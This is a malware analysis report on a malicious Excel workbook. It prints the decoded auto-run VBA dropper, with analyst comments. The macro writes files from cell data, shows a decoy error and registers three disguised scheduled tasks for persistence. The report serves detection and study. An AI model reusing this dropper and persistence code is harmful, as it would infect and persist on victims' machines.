Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 83476c3f9aafce89…

MALICIOUS

Office (OLE) / .XLS

1.10 MB Created: 2022-11-06 05:34:17 Authoring application: Microsoft Excel First seen: 2026-06-17
MD5: d72b0a87d07e99538a645a61f33464e5 SHA-1: c5f5f526dd3f4eda9ecf1e8017c2fe2316ad0b0a SHA-256: 83476c3f9aafce89b0a709fe453ddcabd957fbf841fd8a03dd7427ed7c7fc383
108 Risk Score

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
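    CreateObject call — the matched line instantiates Schedule.Service, the Task Scheduler COM object that the extracted macro uses to register scheduled tasks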
    Matched line in script
    Set service = CreateObject("Schedule.Service")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11477 bytes
SHA-256: 16e7cbca76bb056759bdaaa1457aa63320684f78e3cf564eb4c40cabcef35d39
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
' Auto-run entry point: Excel calls Workbook_Open when the workbook is opened with macros enabled.
' It uses the presence of C:\Users\Public\Music\rar.zip as an "already ran" marker:
'   - marker absent  -> call the drop routine (zXghnYqZ...)
'   - marker present -> show a decoy error message and do nothing else
Dim bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC As String
Dim KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv As String

    ' The path is split into fragments so the full string "C:\Users\Public\Music\rar.zip"
    ' never appears as one literal (defeats naive string matching on the macro source).
    bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC = "C:\Users\" + "Publi" + "c\Musi" + "c\ra" + "r.zip"
    ' Dir returns "" when nothing matches the path, otherwise the matching name.
    KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = Dir(bJeKNBThzjfhMnMDvxNzGbRTHYhCxnrjdAuxamFvwRqXjC, vbDirectory)

    If KQNjfUBrNzrnrChNhSSVJKEWTnyZqAfCeBAnGpbaUewuyv = "" Then
        Call zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF
    Else
        ' Decoy dialog imitating an Excel resource error. The misspelling "availiable" and the
        ' missing space after the period are in the sample itself and are usable as a string indicator.
        MsgBox "Excel cannot complete this task with availiable resources.Choose less data or close other applications."
                
    End If
End Sub

Sub zXghnYqZkrPKEEqFLMkuwtRxuAWWDPRaakegGVMnEVEBLF()
' Drop routine. Collects text stored in Sheet1 cells and hands it to the two writer subs:
'   Sheet1!A12:A54 -> C:\Users\Public\Music\rar.zip  (via distributor)
'   Sheet1!A66     -> C:\Users\Public\Music\pip.bat  (via distributors, which then registers the scheduled tasks)
' The payload therefore lives in worksheet cells, not in the VBA source; the macro is only the decoder/writer.
    
' File-name stems, kept separate from directory and extension so no full path appears as one literal.
Dim DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr As String
DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr = "pip"
' NOTE(review): no Dim for this variable is visible in the extracted source, so it appears to be an
' implicit Variant (which would mean the module has no Option Explicit) - confirm against the full module.
wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw = "rar"

' Cell addresses on Sheet1 that hold the encoded payloads.
Dim ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj As String
ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj = "A66"
Dim LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB As String
LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB = "A12:A54"
' Drop directory: UName() returns "C:\Users\Public\Music\".
Dim MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL As String
MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL = UName()

Dim yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR As Range, cl As Range
Dim ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh As String

' Concatenate every non-empty, non-numeric cell of A12:A54 into one string.
' Presumably each cell holds a "*"-separated chunk of byte values (the writer subs split on "*") - verify in the sheet.
Set yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR = Worksheets("Sheet1").Range(LgrrqDaYekmqwSAnJQVYhaNEvwyYwGktUqaPmhxvyVZEiB)
ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = ""
For Each cl In yVxrmpDUjWeShAjJLNJpXjSnbiSNcnQucLmQHcfhGMNfYR
    If Not IsNumeric(cl.Value) And Not cl.Value = "" Then ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh & cl.Value
Next cl
' Mid(s, 1) returns the whole string, so this line changes nothing.
ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh = Mid(ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh, 1)


Dim dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz As Range, c2 As Range
Dim YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb As String

' Same collection step for the single cell A66 (content of the .bat file).
Set dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz = Worksheets("Sheet1").Range(ddkTJUzucqyTwupgHqXPgJxScJaCbkydZzMUggiwjViPjj)
YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = ""
For Each c2 In dqEzZAqCZGmXktkwaFrRBpMYFPKCUxEvQggQSLhJnEXccz
    If Not IsNumeric(c2.Value) And Not c2.Value = "" Then YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb & c2.Value
Next c2
' No-op, as above.
YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb = Mid(YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb, 1)

' Loop counters handed to the writer subs, followed by the two output paths.
Dim UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long
Dim nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long
Dim pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String
Dim hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String

Dim MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH As String
MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH = ".zip"

Dim NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ As String
NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ = ".bat"

' Resolves to C:\Users\Public\Music\rar.zip (the same file Workbook_Open tests as its run-once marker).
pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + wxqWkCmWPndkPNREMDBevaQdtGxuBDzkEAuritDYMPxWUw + MxvFqqJpFMQJQXmFCyMcCCEkrPrCErNGhLwTZgTPDaDuXH
' Resolves to C:\Users\Public\Music\pip.bat (the action of the "Mgmt_HDD" scheduled task).
hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA = MUHmyJrXpgxdGmheaNnrWhvMPAnNjqnPQzZdpZiVxqzKZL + DSZnRamVRWxWxyfbBFgXLRtbvXgDNACkxYbgkWQUGpvfLr + NuENwnDjEhBEYBMxaVrAAQipFmPZTPgqaAjHFKkZwKAPzJ


' Write rar.zip from the A12:A54 text, then reset the counter the callee used as its loop index.
Call distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp, ySPpvTviWSRxKrtjUxMrXqLZUgYpgpApbzyBgdqTmktwzh)
UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = 0

' Write pip.bat from the A66 text; distributors also starts the scheduled-task registration chain.
Call distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi, YzQiECLjJeGehbHDZcEqQaddBnjBcUjFPxiWwRRfqpyjmb)
nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi = 0

End Sub

' Byte writer for the first dropped file.
'   1st argument: destination path (the caller passes C:\Users\Public\Music\rar.zip)
'   2nd argument: Long used as the loop index; VBA passes it ByRef by default, so the caller's variable is modified
'   TextBox1:     "*"-separated list of values, each converted to one byte with CByte
' Nothing is written when the destination already exists.
Sub distributor(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV As String, UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp As Long, TextBox1 As String)

' Len(Dir(path)) = 0 means no file matches the path, so this only runs on a first execution.
If Len(Dir(pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV)) = 0 Then
    ' all_addresses has no Dim in the visible source (implicit Variant holding the Split result).
    all_addresses = Split(TextBox1, "*")
    ' Open ... For Binary creates the file if it does not exist; file number #1 is hard-coded.
    Open pLpQGWrhFFRLPRJBjFbAKGnfjWrBBuNYTDMHPXSnjkGNKV For Binary As #1
    ' Position just past the current end of file (position 1 for a newly created file).
    Seek #1, LOF(1) + 1
    For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses)
        ' Each token becomes a single raw byte, so the cell text is the file content spelled out byte by byte.
        Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp))
    Next
    Close #1
End If

End Sub

' Byte writer for the second dropped file, followed by the hand-off to scheduled-task registration.
'   1st argument: destination path (the caller passes C:\Users\Public\Music\pip.bat)
'   2nd argument: Long that this body never reads or writes
'   TextBox1:     "*"-separated list of values, each converted to one byte with CByte
Sub distributors(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA As String, nrgQFJRmbqrMyYuYcqPzUvAmYmbckZhPeSbYJxNiWwCMyi As Long, TextBox1 As String)

' Write only when the destination does not exist yet.
If Len(Dir(hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA)) = 0 Then
    all_addresses = Split(TextBox1, "*")
    Open hVmgSbAKkcbRGeBGxWUuuwDQMMEXtSemXmWjuSDVKbBZEA For Binary As #1
    Seek #1, LOF(1) + 1
    ' NOTE(review): the loop index below is the name of distributor's parameter, not a parameter or
    ' declared local of this sub - it looks like a copy-paste of distributor's loop; here it is an implicit variable.
    For UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp = LBound(all_addresses) To UBound(all_addresses)
        Put #1, , CByte(all_addresses(UgMHzuggbxLtgeUbzWbyRBrckxXqrDqnAkTiQYabMmFZgp))
    Next
    Close #1
End If
' Sits outside the If, so the first task-registration sub runs whether or not the file was just written.
Call BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix
End Sub

' Returns the drop directory "C:\Users\Public\Music\" (trailing backslash included).
' Despite the name, no user name is queried: the value is a constant assembled from fragments so the
' full path does not appear as a single literal. C:\Users\Public is normally writable by standard users.
Function UName() As String
    UName = "C:\U" + "sers\" + "Publ" + "ic\M" + "usic\"
End Function

' Registers scheduled task "Mgmt_HDD" in the root task folder through the Task Scheduler COM API.
' The task runs C:\Users\Public\Music\pip.bat once, about 20 seconds after the workbook is opened.
' Indicators from this sub: task name "Mgmt_HDD", author "Micro", description "Start Wordpad at a certain time".
' Ends by calling GHJFGHJGakh, which registers the next task.
Sub BxhFLwyPvmkdaSgJQxyyWXXtDhwGBbCDvSBkDyHGQrwQix()
' Task Scheduler 2.0 enum values: 1 = TASK_TRIGGER_TIME, 0 = TASK_ACTION_EXEC.
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

' Connect with no arguments targets the local machine in the current user's context.
Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

' The description and author are cover text and do not describe what the task runs.
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Micro"

Dim principal
Set principal = taskDefinition.principal

' 3 = TASK_LOGON_INTERACTIVE_TOKEN: the task runs as the logged-on user and needs no stored credentials.
principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
' The task is not hidden, so it is listed in the Task Scheduler UI.
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

' The trigger window opens 20 seconds from now and closes 1 minute from now ("s" = seconds, "n" = minutes).
Dim time
time = DateAdd("s", 20, Now)
startTime = XmlTime(time)

time = DateAdd("n", 1, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
' PT15M is an ISO 8601 duration: 15 minutes.
trigger.ExecutionTimeLimit = "PT15M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

' Action target: the batch file that distributors wrote from Sheet1!A66.
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Music\pip.bat"

' 6 = TASK_CREATE_OR_UPDATE; user and password are omitted; final 3 = TASK_LOGON_INTERACTIVE_TOKEN.
Call rootFolder.RegisterTaskDefinition( _
    "Mgmt_HDD", taskDefinition, 6, , , 3)
Call GHJFGHJGakh
End Sub

' Registers scheduled task "My_Drive" in the root task folder: a recurring persistence task.
' It starts 60 seconds after registration and repeats every 20 minutes, running C:\Users\Public\Music\pip.exe.
' NOTE(review): the visible macro never writes pip.exe; presumably it is produced by pip.bat or unpacked
' from rar.zip - confirm by analysing the dropped files.
' Indicators from this sub: task name "My_Drive", author "Win", description "Start Notepad at a certain time".
' Ends by calling zxcvbnmlkjhgfdsaqweryu, which registers the third task.
Sub GHJFGHJGakh()
' Task Scheduler 2.0 enum values: 1 = TASK_TRIGGER_TIME, 0 = TASK_ACTION_EXEC.
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

' Cover text only; it does not describe what the task runs.
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Notepad at a certain time"
regInfo.Author = "Win"

Dim principal
Set principal = taskDefinition.principal

' 3 = TASK_LOGON_INTERACTIVE_TOKEN: runs as the logged-on user, no stored credentials.
principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime

' First run 60 seconds from now, after the one-shot "Mgmt_HDD" task (20 seconds) has had time to start.
Dim time
time = DateAdd("s", 60, Now)
startTime = XmlTime(time)

trigger.StartBoundary = startTime
' No EndBoundary is set here, and the trigger repeats every 20 minutes (ISO 8601 "PT20M").
trigger.Repetition.Interval = "PT20M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Music\pip.exe"


' 6 = TASK_CREATE_OR_UPDATE; user and password are omitted; final 3 = TASK_LOGON_INTERACTIVE_TOKEN.
Call rootFolder.RegisterTaskDefinition( _
    "My_Drive", taskDefinition, 6, , , 3)
Call zxcvbnmlkjhgfdsaqweryu
End Sub

' Registers scheduled task "Tls_Drive" in the root task folder: a second recurring persistence task.
' It starts 11 minutes after registration and repeats every 5 minutes, running C:\Users\Public\Pictures\tls.bat.
' NOTE(review): the visible macro never writes tls.bat and uses a different directory (Pictures, not Music);
' presumably an earlier stage creates it - confirm by analysing the dropped files.
' Indicators from this sub: task name "Tls_Drive", author "Win", description "Start Notepad at a certain time".
' Last link in the registration chain: it calls no further sub.
Sub zxcvbnmlkjhgfdsaqweryu()
' Task Scheduler 2.0 enum values: 1 = TASK_TRIGGER_TIME, 0 = TASK_ACTION_EXEC.
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

' Same cover text as the "My_Drive" task.
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Notepad at a certain time"
regInfo.Author = "Win"

Dim principal
Set principal = taskDefinition.principal

' 3 = TASK_LOGON_INTERACTIVE_TOKEN: runs as the logged-on user, no stored credentials.
principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime

' "n" is the DateAdd interval code for minutes: first run 11 minutes from now.
Dim time
time = DateAdd("n", 11, Now)
startTime = XmlTime(time)

trigger.StartBoundary = startTime
' No EndBoundary is set, and the trigger repeats every 5 minutes (ISO 8601 "PT5M").
trigger.Repetition.Interval = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Pictures\tls.bat"

' 6 = TASK_CREATE_OR_UPDATE; user and password are omitted; final 3 = TASK_LOGON_INTERACTIVE_TOKEN.
Call rootFolder.RegisterTaskDefinition( _
    "Tls_Drive", taskDefinition, 6, , , 3)
End Sub

' Formats a date/time value as "YYYY-MM-DDTHH:MM:SS", the form the callers in this module assign
' to trigger.StartBoundary and trigger.EndBoundary. Every field except the year is zero-padded to
' two digits by prefixing "0" and keeping the rightmost two characters.
Function XmlTime(t)
    Dim datePart, timePart

    ' Date portion: year as-is, month and day padded.
    datePart = Year(t) & "-" & Right("0" & Month(t), 2) & "-" & Right("0" & Day(t), 2)

    ' Time portion: hour, minute and second padded.
    timePart = Right("0" & Hour(t), 2) & ":" & Right("0" & Minute(t), 2) & ":" & Right("0" & Second(t), 2)

    XmlTime = datePart & "T" & timePart
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True